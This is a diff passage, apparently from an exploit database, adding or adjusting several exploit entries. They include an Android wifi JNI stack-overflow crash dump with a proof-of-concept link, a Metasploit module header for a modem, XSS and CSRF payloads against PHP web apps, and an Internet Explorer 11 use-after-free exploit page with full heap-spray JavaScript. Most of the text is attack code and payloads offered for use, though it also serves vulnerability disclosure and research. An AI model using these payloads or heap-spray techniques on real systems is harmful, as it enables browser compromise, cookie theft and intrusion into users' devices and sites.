+        params.ap[i].low = helper.getIntField(objAp, "low");
+        params.ap[i].high = helper.getIntField(objAp, "high");
+    }
+
+See attached for a POC which causes a crash before the function with the corrupted stack frame returns and checks the stack cookie.
+
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+[---------------------------------------------------------------------REGISTERS----------------------------------------------------------------------]
+*X0   0x80000000 <-- 0x0
+*X1   0x0
+*X2   0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
+*X3   0x3
+*X4   0x709bf05fc0 <-- stp    x28, x27, [sp, #-0x60]!
+*X5   0x709c1f07b0 (art::gJniNativeInterface) <-- 0x0
+*X6   0x709bf27034 <-- cbz    x2, #0x709bf27040 /* u'b' */
+*X7   0x284801ff284800ff
+*X8   0xc01d0142c01d0229
+*X9   0x1
+*X10  0xc01d0142c01d0141
+*X11  0x7082dff4e8 <-- 0x41013fb31dc0
+ X12  0x0
+*X13  0x0
+*X14  0x0
+*X15  0x33511e057221be
+*X16  0x709f0035a0 (pthread_getspecific@got.plt) --> 0x709efaad5c (pthread_getspecific) <-- movz   w8, #0x8000, lsl #16
+*X17  0x709efaad5c (pthread_getspecific) <-- movz   w8, #0x8000, lsl #16
+*X18  0x0
+*X19  0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
+*X20  0x7082dfe0a0 --> 0x70833c1470 --> 0x7083381c0c (android::JNIObject<_jobject*>::~JNIObject()) <-- adrp   x2, #0x70833c2000
+*X21  0x7082dfe0b8 --> 0x70833c1490 --> 0x7083381c70 (android::JNIObject<_jstring*>::~JNIObject()) <-- adrp   x2, #0x70833c2000
+*X22  0x7082dfe078 <-- 0x0
+*X23  0xb1da807287fa8cf
+*X24  0x709f00e86c (je_tsd_tsd) <-- 0xa880000000
+*X25  0x7082dfe8d8 <-- u'c0:1d:b3:3f:1:4...'
+*X26  0x200011
+*X27  0x7082dfe0d0 <-- 0x100000000001
+*X28  0x707882c3e0 <-- u'c0:1d:b3:3f:01:...'
+*SP   0x70815310f0 <-- 0x0
+*PC   0x709efaada8 (pthread_getspecific+76) <-- ldr    x10, [x10, #0xe0]
+[------------------------------------------------------------------------CODE------------------------------------------------------------------------]
+ => 0x709efaada8L <pthread_getspecific+76>    ldr    x10, [x10, #0xe0]
+    0x709efaadacL <pthread_getspecific+80>    cmp    x10, x9
+    0x709efaadb0L <pthread_getspecific+84>    b.ne   #pthread_getspecific+56       <0x709efaad94>
+...
+    0x709efaad94L <pthread_getspecific+56>    mov    x0, xzr
+    0x709efaad98L <pthread_getspecific+60>    str    xzr, [x8]
+    0x709efaad9cL <pthread_getspecific+64>    ret    
+
+    0x709efaada0L <pthread_getspecific+68>    add    x10, x10, x8, lsl #4
+    0x709efaada4L <pthread_getspecific+72>    add    x8, x10, #0xe8
+ => 0x709efaada8L <pthread_getspecific+76>    ldr    x10, [x10, #0xe0]
+    0x709efaadacL <pthread_getspecific+80>    cmp    x10, x9
+    0x709efaadb0L <pthread_getspecific+84>    b.ne   #pthread_getspecific+56       <0x709efaad94>
+[------------------------------------------------------------------------CODE------------------------------------------------------------------------]
+155	in bionic/libc/bionic/pthread_key.cpp
+[-----------------------------------------------------------------------STACK------------------------------------------------------------------------]
+00:0000| sp  0x70815310f0 <-- 0x0
+...
+04:0020|     0x7081531110 --> 0x3f800000 <-- 0x0
+05:0028|     0x7081531118 <-- 0x0
+...
+[---------------------------------------------------------------------BACKTRACE----------------------------------------------------------------------]
+>  f 0       709efaada8 pthread_getspecific+76
+   f 1       709efd2394 je_free+68
+   f 2       709efd2394 je_free+68
+   f 3       709efd2394 je_free+68
+   f 4       709efd2394 je_free+68
+   f 5       7083387d10
+   f 6       7083387d10
+   f 7       7083387d10
+Program received signal SIGSEGV (fault address 0x1d0142c01d0221)
+pwndbg> bt
+#0  pthread_getspecific (key=<optimized out>) at bionic/libc/bionic/pthread_key.cpp:160
+#1  0x000000709efd2394 in je_tsd_wrapper_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
+#2  je_tsd_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
+#3  je_tsd_fetch () at external/jemalloc/include/jemalloc/internal/tsd.h:614
+#4  je_free (ptr=0x707882c3e0) at external/jemalloc/src/jemalloc.c:1932
+#5  0x0000007083387d10 in _JNIEnv::ReleaseStringUTFChars (utf=0x707882c3e0 "c0:1d:b3:3f:01:"..., string=0x200011, this=0x7091fd2b00) at libnativehelper/include/nativehelper/jni.h:851
+#6  ScopedUtfChars::~ScopedUtfChars (this=<synthetic pointer>, __in_chrg=<optimized out>) at libnativehelper/include/nativehelper/ScopedUtfChars.h:45
+#7  android::android_net_wifi_setHotlist (env=0x7091fd2b00, cls=<optimized out>, iface=<optimized out>, id=0x690a3633, ap=<optimized out>) at frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp:799
+#8  0x000000709b1a084c in ?? ()
+
+Fixed in https://source.android.com/security/bulletin/2016-12-01.html
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40945.zip

platforms/linux_mips/remote/40740.rb

@@ -15,12 +15,12 @@ By sending certain TR-064 commands, we can instruct the modem to open port 80 on
  
 Proof of Concept
 ================
+=end
+
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-=end
-
 
 require 'msf/core'
  

platforms/php/webapps/13925.txt

@@ -21,7 +21,7 @@ action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/
 <label for="subject">Subject:</label><input id="subject" name="subject" 
 type="text" /><br />
 <label for="message">Message:</label><textarea id="message" 
-name="message">&lt;/textarea&gt;<br />
+name="message"></textarea><br />
 <input type="submit" value="Send"/>
 </form>
 

platforms/php/webapps/28620.txt

@@ -6,4 +6,4 @@ These issues may allow an attacker to access sensitive information, execute arbi
    
 Version 1.1.0 is vulnerable; other versions may also be affected.
 
-http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=&lt;/textarea&gt;<script>alert(document.cookie);</script>
+http://www.example.com/adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><script>alert(document.cookie);</script>

platforms/windows/dos/40946.html

@@ -0,0 +1,188 @@
+<!--
+Source: http://blog.skylined.nl/20161220001.html
+
+Synopsis
+
+A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 11. There is sufficient time between the free and reuse for an attacker to control the contents of the freed memory and exploit the vulnerability.
+
+Known affected software, attack vectors and potential mitigations
+
+Microsoft Internet Explorer 11
+
+An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
+
+Details
+
+This was one of the first bugs where I attempted to do a proper analysis, and I got some feedback from ZDI that explained what I got right and what I got wrong. Basically, on x86, a 0x28 byte memory block is allocated in MSHTML!CMarkup::Do­Embed­Pointers and when you execute document.exec­Command("Delete"). This memory can be freed when you execute document.open() in a DOMNode­Removed event handler. After that, you can use Javascript to reallocate the memory before it is reused.
+
+Repro.html:
+
+<!doctype html>
+<html>
+  <head>
+    <meta http-equiv="X-UA-Compatible" content="IE=11"> 
+    <script type="text/javascript">
+      document.add­Event­Listener("DOMNode­Removed", function () {
+        document.open(); // free
+        // attempt to modify freed memory here
+        // because it will be reused after this function returns.
+      }, true);
+      window.onload = function () {
+        document.design­Mode="on";
+        document.exec­Command("Select­All");
+        document.exec­Command("Delete"); // allocate
+      };
+    </script>
+  </head>
+  <body>
+  </body>
+</html>
+
+Exploit
+
+After getting the feedback from ZDI that helped me understand the root cause, I attempted to write an exploit that the issue could be controlled and may be exploitable. I did not keep track of whether my attempts where successful, so the below code may not actually function. However, it should give you an idea on how one might go about writing an exploit for this vulnerability.
+
+Sploit.html:
+-->
+
+<!doctype html>
+<html>
+  <head>
+    <meta http-equiv="X-UA-Compatible" content="IE=11"> 
+    <script src="c­LFHSpray.js"></script>
+    <script src="c­Block­Spray.js"></script>
+    <script>
+      var aau­Copies­And­Sizes  = [
+          [0x08, 0x80], 
+          [0x08, 0x40], 
+          [0x08, 0x20], 
+          [0x10, 0x80]
+      ];
+      var u­Base­Address = 0x12340000;
+      var ao­Block­Sprays = new Array(aau­Copies­And­Sizes.length);
+      for (var i = 0; i < aau­Copies­And­Sizes.length; i++) {
+        ao­Block­Sprays[i] = new c­Block­Spray(aau­Copies­And­Sizes[i][0], aau­Copies­And­Sizes[i][1]);
+        ao­Block­Sprays[i].set­Chunk­DWord(0x0100, u­Base­Address + 0x0300);
+        ao­Block­Sprays[i].spray();
+      }
+      document.add­Event­Listener("DOMNode­Removed", function () {
+        document.open();
+        var o­LFHReuse = new c­LFHSpray(10, 0x28);
+        o­LFHReuse.set­DWord(0x10, u­Base­Address + 0x0100);
+        o­LFHReuse.set­DWord(0x14, u­Base­Address + 0x0200);
+        o­LFHReuse.spray();
+      }, true);
+      window.onload = function () {
+        document.design­Mode="on";
+        document.exec­Command("Select­All");
+        document.exec­Command("Delete");
+        document.design­Mode="off";
+      };
+    </script>
+  </head>
+  <body>
+  </body>
+</html>
+
+<!--
+########################################################################
+
+c­LFHSpray.js:
+
+function c­LFHSpray(u­Count, u­Size) {
+  this.ao­Elements = new Array(u­Count);
+  var au­Spray­Chars = new Array(u­Size - 1 >> 1);
+  for (var i = 0; i < au­Spray­Chars.length; i++) {
+    au­Spray­Chars[i] = ((i & 0x­FF) * 0x202 + 0x100) & 0x­FFFF;
+  }
+  this.set­DWord = function(u­Offset, u­Value) {
+    this.set­Word(u­Offset, u­Value & 0x­FFFF);
+    this.set­Word(u­Offset + 2, u­Value >>> 16);
+  }
+  this.set­Word = function(u­Offset, u­Value) {
+    this.set­Byte(u­Offset, u­Value & 0x­FF);
+    this.set­Byte(u­Offset + 1, u­Value >>> 8);
+  }
+  this.set­Byte = function(u­Offset, u­Value) {
+    var u­Char­Offset = u­Offset >> 1;
+    var u­Byte0 = (u­Offset & 1 ? au­Spray­Chars[u­Char­Offset] : u­Value) & 0x­FF;
+    var u­Byte1 = (u­Offset & 1 ? u­Value : (au­Spray­Chars[u­Char­Offset] >> 8)) & 0x­FF;
+    au­Spray­Chars[u­Char­Offset] = u­Byte0 + (u­Byte1 << 8);
+  }
+  this.spray = function() {
+    var s­Spray­Buffer = String.from­Char­Code.apply(0, au­Spray­Chars);
+    for (var i = 0; i < u­Count; i++) {
+      this.ao­Elements[i] = document.create­Element("span"); // allocate 0x34 bytes
+      this.ao­Elements[i].class­Name = s­Spray­Buffer; // allocate 0x10, u­Size and 0x40 bytes.
+    }
+  }
+}
+
+########################################################################
+
+c­Block­Spray.js:
+
+var c­Block­Spray = (function() {
+  var u­Chunk­Size = 0x10000;
+  var u­Block­Header­Size = 0x10;
+  var u­Block­Footer­Size = 0x04;
+  var as­Chunk­Template = new Array(u­Chunk­Size / 2);
+  for (var u­Index = 0; u­Index < as­Chunk­Template.length; u­Index += 2) {
+    as­Chunk­Template[u­Index] = String.from­Char­Code(u­Index);
+    as­Chunk­Template[u­Index + 1] = String.from­Char­Code(0x­DEAD);
+  }
+  return function c­Block­Spray(u­Block­Count, u­Chunk­Count) {
+    this.u­Block­Size = u­Chunk­Count * u­Chunk­Size - u­Block­Header­Size - u­Block­Footer­Size;
+    var s­Chunk = as­Chunk­Template.join("");
+    var s­Block, as­Blocks = new Array(u­Block­Count);
+    this.set­Chunk­DWord = function (u­Offset, u­Value) {
+      this.set­Chunk­Word(u­Offset, u­Value & 0x­FFFF);
+      this.set­Chunk­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
+    }
+    this.set­Chunk­Word = function (u­Offset, u­Value) {
+      if (s­Block) throw new Error("Cannot set chunk values after generating block");
+      if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
+      if (u­Offset >= u­Chunk­Size) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + u­Chunk­Size.to­String(16));
+      var u­Index = u­Offset / 2;
+      var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
+      s­Chunk = s­Chunk.substr(0, u­Index) + s­Value + s­Chunk.substr(u­Index + 1);
+    }
+    this.generate­Block = function () {
+      if (s­Block) throw new Error("Cannot generating block twice");
+      s­Block = (
+        s­Chunk.substr(u­Block­Header­Size / 2) +
+        new Array(u­Chunk­Count - 1).join(s­Chunk) +
+        s­Chunk.substr(0, (u­Chunk­Size - u­Block­Footer­Size) / 2)
+      );
+    }
+    this.set­Block­DWord = function (u­Offset, u­Value) {
+      this.set­Block­Word(u­Offset, u­Value & 0x­FFFF);
+      this.set­Block­Word(u­Offset + 2, (u­Value >> 16) & 0x­FFFF);
+    }
+    this.set­Block­Word = function (u­Offset, u­Value) {
+      if (!s­Block) this.generate­Block();
+      if (u­Offset & 1) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be Word aligned");
+      var u­Index = (u­Offset - u­Block­Header­Size) / 2;
+      if (u­Index < 0) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be larger than 0x" + u­Block­Header­Size.to­String(16));
+      if (u­Index >= s­Block.length) throw new Error("u­Offset (" + u­Offset.to­String(16) + ") must be smaller than 0x" + (u­Block­Header­Size + s­Block.length * 2).to­String(16));
+      var s­Value = String.from­Char­Code(u­Value & 0x­FFFF);
+      s­Block = s­Block.substr(0, u­Index) + s­Value + s­Block.substr(u­Index + 1);
+    }
+    this.spray = function() {
+      if (!s­Block) this.generate­Block();
+      for (var i = 0; i < u­Block­Count; i++) {
+        as­Blocks[i] = ("" + s­Block).slice(0);
+      }
+    }
+  }
+})();
+
+
+Time-line
+
+30 December 2013: This vulnerability was submitted to ZDI.
+8 January 2014: This vulnerability was acquired by ZDI.
+14 January 2014: This vulnerability was disclosed to Microsoft by ZDI.
+10 June 2014: This vulnerability was address by Microsoft in MS14-035.
+20 December 2016: Details of this vulnerability are released.
+-->